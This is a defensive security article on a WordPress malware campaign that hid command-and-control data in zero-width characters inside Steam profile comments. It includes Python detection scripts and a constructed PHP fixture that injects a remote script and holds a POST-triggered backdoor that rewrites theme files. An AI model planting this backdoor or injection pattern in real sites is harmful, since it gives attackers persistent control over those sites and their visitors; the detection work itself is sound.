Cybercriminals are always looking for places to hide. Sometimes that means compromised servers, fake domains, or cloud storage accounts. In one recent WordPress malware campaign, attackers took a more unusual route: they used Steam Community profile comments as part of their command-and-control setup.
At first glance, that sounds odd. Steam is a gaming platform, not a typical malware hosting service. That is exactly what makes the technique interesting. By placing hidden data inside public profile comments on a trusted platform, attackers made their infrastructure look less suspicious than a random malicious server.
This campaign is a useful reminder that modern website malware is not always obvious. It may not rely on a suspicious-looking file name or a hardcoded malicious domain. Sometimes the dangerous part is hidden in plain sight.
What Happened
Security researchers found malware targeting WordPress sites that fetched data from Steam Community profile comments. Those comments appeared normal to a casual viewer, but they contained hidden encoded information.
The infected WordPress site would retrieve the public Steam profile page, extract comment content, decode hidden data from it, and use that decoded data to load malicious JavaScript on the website.
The Steam comment acted like a hidden instruction board. The malware on the WordPress site checked that board, decoded the instructions, and then used them to decide what script to load.
Why Use Steam Profile Comments
Attackers often try to make their activity blend in with normal internet traffic. A request to an obviously suspicious domain may stand out in logs or security tools. A request to a well-known platform may attract less attention.
Using a trusted platform also gives attackers flexibility. Instead of modifying malware code on every infected WordPress site, they can change the content hosted elsewhere. The infected sites then fetch the updated instructions the next time the malware runs.
This is a common idea in command-and-control design: separate the infected system from the place where instructions are stored. The unusual part here is the use of public comments on a gaming community platform.
How the Hidden Data Worked
The campaign used a form of steganography, which means hiding information inside something that appears harmless. Instead of hiding data in an image or document, the malware hid it inside text.
The visible comment text acted as cover. The real data was encoded using invisible Unicode characters, such as zero-width characters. These characters do not display on screen, so a person viewing the comment might see ordinary text while the malware sees a hidden message.
Once the WordPress malware extracted the comment, it scanned for those invisible characters, converted them back into data, and used the result to build the next stage of the attack.
Some samples also included encryption and integrity checks. That means the hidden payload was not just obscured but also protected in a way that made casual analysis more difficult.
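To make the extraction step concrete, here is a small analyst-side triage script. It is an added example for this article, not code from the campaign or from the researchers' report. It flags invisible characters in a comment, shows what a human would see, and decodes the carrier under an assumed scheme (U+200B as bit 0, U+200C as bit 1, eight bits per byte, UTF-8 payload); the real samples may use a different mapping, and the sample comment is a constructed fixture.

```python
"""Flag and decode zero-width-character steganography in fetched text.

Added example for this article; it is not code from the campaign or from the
researchers' report. The bit encoding below is an assumption chosen to
illustrate the technique (U+200B = 0, U+200C = 1, eight bits per byte, MSB
first, UTF-8 payload); the real samples may use a different scheme.
"""

# Invisible code points worth flagging wherever user-supplied text is consumed.
ZERO_WIDTH = {
    "\u200b": "ZERO WIDTH SPACE",
    "\u200c": "ZERO WIDTH NON-JOINER",
    "\u200d": "ZERO WIDTH JOINER",
    "\u2060": "WORD JOINER",
    "\ufeff": "ZERO WIDTH NO-BREAK SPACE",
}


def find_zero_width(text):
    """Return (offset, code point name) for every invisible character in text."""
    return [(i, ZERO_WIDTH[ch]) for i, ch in enumerate(text) if ch in ZERO_WIDTH]


def strip_zero_width(text):
    """What a person actually sees when the comment is rendered."""
    return "".join(ch for ch in text if ch not in ZERO_WIDTH)


def extract_hidden_bytes(text, zero="\u200b", one="\u200c"):
    """Decode the assumed two-symbol scheme: collect the carrier characters in
    order, pack them eight at a time into bytes, drop any trailing partial byte."""
    bits = [0 if ch == zero else 1 for ch in text if ch in (zero, one)]
    payload = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        byte = 0
        for bit in bits[i:i + 8]:
            byte = (byte << 1) | bit
        payload.append(byte)
    return bytes(payload)


def assess_comment(text, threshold=8):
    """Triage one comment: a couple of invisible characters can be copy-paste
    noise, but dozens in a short comment is a carrier, not an accident."""
    hits = find_zero_width(text)
    return {
        "visible_text": strip_zero_width(text),
        "hidden_char_count": len(hits),
        "suspicious": len(hits) >= threshold,
        "decoded_payload": extract_hidden_bytes(text).decode("utf-8", errors="replace"),
    }


# Constructed fixture: an innocuous-looking comment carrying the two bytes 0x76 0x33 ("v3").
_HIDDEN = (
    "\u200b\u200c\u200c\u200c\u200b\u200c\u200c\u200b"   # 0111 0110 = 0x76 'v'
    "\u200b\u200b\u200c\u200c\u200b\u200b\u200c\u200c"   # 0011 0011 = 0x33 '3'
)
SAMPLE_COMMENT = "great game last night " + _HIDDEN + "gg"
CLEAN_COMMENT = "thanks for the trade"

if __name__ == "__main__":
    for comment in (SAMPLE_COMMENT, CLEAN_COMMENT):
        print(assess_comment(comment))
```

The useful signal for a defender is the count and density of invisible characters, not the decoded bytes: the count is independent of whatever encoding or encryption the attacker layers on top, so the `suspicious` flag still fires on samples whose payload would decode to garbage.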
What the Malware Did on WordPress Sites
The malware had two main jobs.
The first was client-side script injection. Once the malware decoded the hidden data from the Steam comment, it used that information to load an external JavaScript file into public WordPress pages. Visitors to the infected site could then be exposed to whatever the attacker's script was designed to do.
The second was persistence through a server-side backdoor. The malware included code that allowed attackers to send specially crafted requests to the infected WordPress site. If the request passed the malware's checks, the attacker could modify plugin or theme files.
That matters because removing only the visible script injection may not be enough. If the backdoor remains, the attacker may be able to reinfect the site or change the malware later.
Why This Technique Is Harder to Detect
This campaign combines several tactics that make detection more difficult.
| Tactic | Why It Helps the Attacker |
|---|---|
| Abuses a legitimate platform | Traffic to a well-known site raises less suspicion than traffic to an unknown domain |
| Hides commands in invisible characters | A visual review of the comment reveals nothing |
| Separates control data from the infected site | Attackers can update behavior without touching every victim site |
| Persistent backdoor | Cleanup of the visible symptom does not remove deeper access |
Security teams that only monitor for known malicious domains, recently registered infrastructure, or obviously suspicious file names may miss an attack that routes commands through a trusted gaming platform.
What WordPress Site Owners Should Do
The biggest lesson is that malware cleanup needs to go deeper than the obvious symptom. A site loading a suspicious script may only be showing the visible part of a larger compromise.
A proper response should include:
- Reviewing recently modified theme and plugin files
- Checking for unauthorized admin accounts
- Rotating passwords, access keys, and API credentials
- Updating WordPress core, plugins, and themes
- Reviewing server logs for unusual POST requests or unexpected outbound traffic
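The log review step is the one most often skipped, so here is an added example of what "unusual POST requests" means in practice for a WordPress install. It is not code from the GoDaddy write-up. The access log lines are a constructed fixture (RFC 5737 test addresses, invented paths and timestamps), and the allow-list of normal POST targets is an assumption that should be extended for whatever form or e-commerce plugins the site actually runs.

```python
"""Find unusual POST requests in a WordPress access log.

Added example for this article; not from the GoDaddy write-up. The log lines are a
constructed fixture (RFC 5737 test addresses, invented paths); the allow-list of
normal POST targets is an assumption to adapt to the site.
"""
import re
from collections import Counter
from urllib.parse import urlsplit

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Paths a stock WordPress install legitimately receives POSTs on (assumed baseline).
EXPECTED_POST_PATHS = {"/wp-login.php", "/wp-comments-post.php", "/xmlrpc.php", "/wp-cron.php"}
EXPECTED_POST_PREFIXES = ("/wp-admin/", "/wp-json/")


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_post(path):
    """Return a reason string if a POST to this path is unusual, else None."""
    path = urlsplit(path).path  # drop any query string before matching
    if path in EXPECTED_POST_PATHS or path.startswith(EXPECTED_POST_PREFIXES):
        return None
    if path.endswith(".php"):
        # Normal WordPress traffic never POSTs straight at plugin or theme files;
        # a backdoor that accepts crafted requests has to be reached that way.
        if path.startswith(("/wp-content/plugins/", "/wp-content/themes/")):
            return "direct POST to plugin/theme PHP file"
        if path.startswith("/wp-content/uploads/"):
            return "PHP executed from uploads directory"
        return "POST to unexpected PHP file"
    return "POST to unexpected path"


def unusual_posts(lines):
    findings = []
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] != "POST":
            continue
        reason = classify_post(rec["path"])
        if reason:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "path": rec["path"],
                             "status": rec["status"], "reason": reason})
    return findings


def top_sources(findings):
    """Which client addresses generated the unusual POSTs, most active first."""
    return Counter(f["ip"] for f in findings).most_common()


# Constructed fixture: a few minutes of traffic, including three backdoor-style requests.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2025:14:02:11 +0000] "GET /index.php HTTP/1.1" 200 15214 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Mar/2025:14:02:19 +0000] "POST /wp-login.php HTTP/1.1" 200 3280 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Mar/2025:14:03:01 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 41 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Mar/2025:14:05:44 +0000] "POST /wp-content/plugins/example-plugin/inc/helper.php HTTP/1.1" 200 12 "-" "-"',
    '198.51.100.23 - - [10/Mar/2025:14:05:45 +0000] "POST /wp-content/themes/example-theme/functions.php?x=1 HTTP/1.1" 200 12 "-" "-"',
    '198.51.100.23 - - [10/Mar/2025:14:06:02 +0000] "POST /wp-content/uploads/2025/03/cache.php HTTP/1.1" 200 12 "-" "-"',
    '203.0.113.9 - - [10/Mar/2025:14:10:30 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    found = unusual_posts(SAMPLE_LOG)
    for f in found:
        print(f["ts"], f["ip"], f["path"], "->", f["reason"])
    print("top sources:", top_sources(found))
```

Run it over the real log with `unusual_posts(open("access.log"))`. A POST that lands directly on a file under `wp-content/plugins/` or `wp-content/themes/` and returns 200 is worth a manual look regardless of what else the scan shows; compare the timestamps with the modification times of the files reviewed in the first step.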
It is also important to understand how the attacker got in. Common entry points include stolen credentials, vulnerable plugins, outdated themes, weak hosting access, or compromised administrator accounts. Cleaning the malware without closing the entry point leads to reinfection.
What Defenders Should Watch For
Even without specific indicators, defenders can look for behavioral patterns:
| Pattern | Why It Matters |
|---|---|
| WordPress code fetching content from unrelated third-party platforms | Legitimate plugins generally do not do this |
| Plugin or theme files making unexpected outbound requests | Points to attacker-controlled fetching behavior |
| Invisible-character decoding inside PHP code | Suggests steganographic payload extraction |
| Unexpected JavaScript added to public pages | Visible symptom of the injection stage |
| PHP code responding to specially crafted POST requests | Signs of a backdoor |
| Recently modified files in plugins or themes that should not have changed | Post-compromise modification |
| Obfuscated PHP mixed into otherwise normal WordPress files | Indicator of hidden malicious code |
The key signal is behavioral: legitimate WordPress plugins should not need to pull hidden data from public gaming platform comments and use it to load scripts on visitor-facing pages.
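The patterns in the table can be turned into a first-pass static triage of plugin and theme files. The script below is an added example for this article, not code from the GoDaddy write-up; its regexes, weights and thresholds are assumptions for illustration, and the two PHP snippets are constructed fixtures with placeholder values rather than real samples. It scores each file on the behaviours listed above (outbound fetching, references to a public platform used as a dead drop, zero-width character handling, script tags built from variables, request-controlled file writes, and decoding functions typical of obfuscation) and also notes recently modified files.

```python
"""Static triage of WordPress plugin and theme PHP for the behaviours in the table.

Added example for this article, not code from the GoDaddy write-up. The regexes
and weights are assumptions for illustration; the sample PHP below is a
constructed fixture with placeholder values, not a real sample.
"""
import os
import re
import time

# Outbound HTTP from PHP or WordPress helper functions (real function names).
FETCH_CALLS = re.compile(
    r"\b(?:wp_remote_get|wp_remote_post|wp_remote_request|file_get_contents|curl_init|curl_exec)\s*\(")
# Public platforms a plugin has no business reading profile content from.
# steamcommunity.com is the one named in the campaign; extend the tuple for your environment.
DEAD_DROP_HOSTS = ("steamcommunity.com",)
# Zero-width code points as they appear in PHP or PCRE source: \u{200B}, \x{200B},
# raw UTF-8 byte escapes \xE2\x80\x8B, HTML entities, or the literal invisible character.
ZW_CHARS = "\u200b\u200c\u200d\u2060\ufeff"
ZERO_WIDTH_LITERALS = re.compile(
    r"\\[ux]\{(?:200[bcd]|2060|feff)\}|\\xe2\\x80\\x8[bcd]|&#820[345];|[" + ZW_CHARS + "]",
    re.IGNORECASE)
# A <script src=...> assembled from a variable instead of going through wp_enqueue_script().
SCRIPT_INJECT = re.compile(r"<script\b[^\n]*src[^\n]*\$\w+", re.IGNORECASE)
# Request-controlled input in the same file as a file write or eval: the backdoor shape described above.
REQUEST_INPUT = re.compile(r"\$_(?:POST|REQUEST|GET|COOKIE)\b")
FILE_WRITE_OR_EVAL = re.compile(r"\b(?:file_put_contents|fwrite|fputs|move_uploaded_file|eval)\s*\(")
OBFUSCATION = re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")

WEIGHTS = {
    "outbound_fetch": 1,        # common in legitimate plugins, informational on its own
    "dead_drop_host": 3,
    "zero_width_handling": 3,
    "script_injection": 2,
    "request_driven_write": 4,
    "obfuscation": 2,
}


def triage_php(source):
    """Return the finding tags present in one PHP source string and a weighted score."""
    tags = []
    if FETCH_CALLS.search(source):
        tags.append("outbound_fetch")
    if any(host in source.lower() for host in DEAD_DROP_HOSTS):
        tags.append("dead_drop_host")
    if ZERO_WIDTH_LITERALS.search(source):
        tags.append("zero_width_handling")
    if SCRIPT_INJECT.search(source):
        tags.append("script_injection")
    if REQUEST_INPUT.search(source) and FILE_WRITE_OR_EVAL.search(source):
        tags.append("request_driven_write")
    if OBFUSCATION.search(source):
        tags.append("obfuscation")
    score = sum(WEIGHTS[t] for t in tags)
    verdict = "suspicious" if score >= 5 else "review" if score else "clean"
    return {"tags": tags, "score": score, "verdict": verdict}


def scan_tree(root, recent_days=7):
    """Walk wp-content/plugins or wp-content/themes, triage each .php file, note recent changes."""
    cutoff = time.time() - recent_days * 86400
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                result = triage_php(fh.read())
            result["path"] = path
            result["recently_modified"] = os.stat(path).st_mtime > cutoff
            results.append(result)
    return sorted(results, key=lambda r: r["score"], reverse=True)


# Constructed fixtures (not real samples). Values marked PLACEHOLDER are placeholders.
BENIGN_PLUGIN = r"""<?php
function example_check_update() {
    $response = wp_remote_get('https://api.wordpress.org/plugins/info/1.2/?action=plugin_information&request[slug]=example');
    if (is_wp_error($response)) { return null; }
    return json_decode(wp_remote_retrieve_body($response));
}
add_action('wp_enqueue_scripts', function () {
    wp_enqueue_script('example-js', plugins_url('js/example.js', __FILE__), array(), '1.0', true);
});
"""

SUSPICIOUS_PLUGIN = r"""<?php
add_action('wp_footer', function () {
    $page = wp_remote_get('https://steamcommunity.com/profiles/PLACEHOLDER-ID');
    $carrier = preg_replace('/[^\x{200B}\x{200C}]/u', '', wp_remote_retrieve_body($page));
    $url = base64_decode(decode_carrier($carrier));
    echo '<script src="' . $url . '"></script>';
});
if (isset($_POST['k']) && $_POST['k'] === 'PLACEHOLDER-TOKEN') {
    file_put_contents(get_template_directory() . '/functions.php', $_POST['d']);
}
"""

if __name__ == "__main__":
    print("benign:", triage_php(BENIGN_PLUGIN))
    print("suspicious:", triage_php(SUSPICIOUS_PLUGIN))
```

The benign plugin also makes an outbound request, which is exactly why a single tag scores low: the point of the weighting is that legitimate code fetches from WordPress.org or its own vendor, not from a gaming profile, and does not pair that fetch with zero-width handling and a request-driven file write in the same file. Run `scan_tree("/path/to/wp-content/plugins")` and look first at entries that are both high-scoring and recently modified.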
Why This Matters Beyond WordPress
Although this campaign targeted WordPress, the underlying idea is not WordPress-specific. Attackers can abuse legitimate platforms as dead drops for malware instructions. Social profiles, comments, bios, paste sites, cloud documents, and other public content can all be misused in similar ways.
That does not mean every connection to a legitimate platform is malicious. It means defenders need to understand context. A website unexpectedly fetching public profile comments from a gaming platform is very different from a user browsing that platform normally.
Modern detection has to look not only at where traffic goes, but also at why it is happening and what the local code does with the response.
Sources:
- GoDaddy — Malware Targeting WordPress Abuses Steam Community Profiles
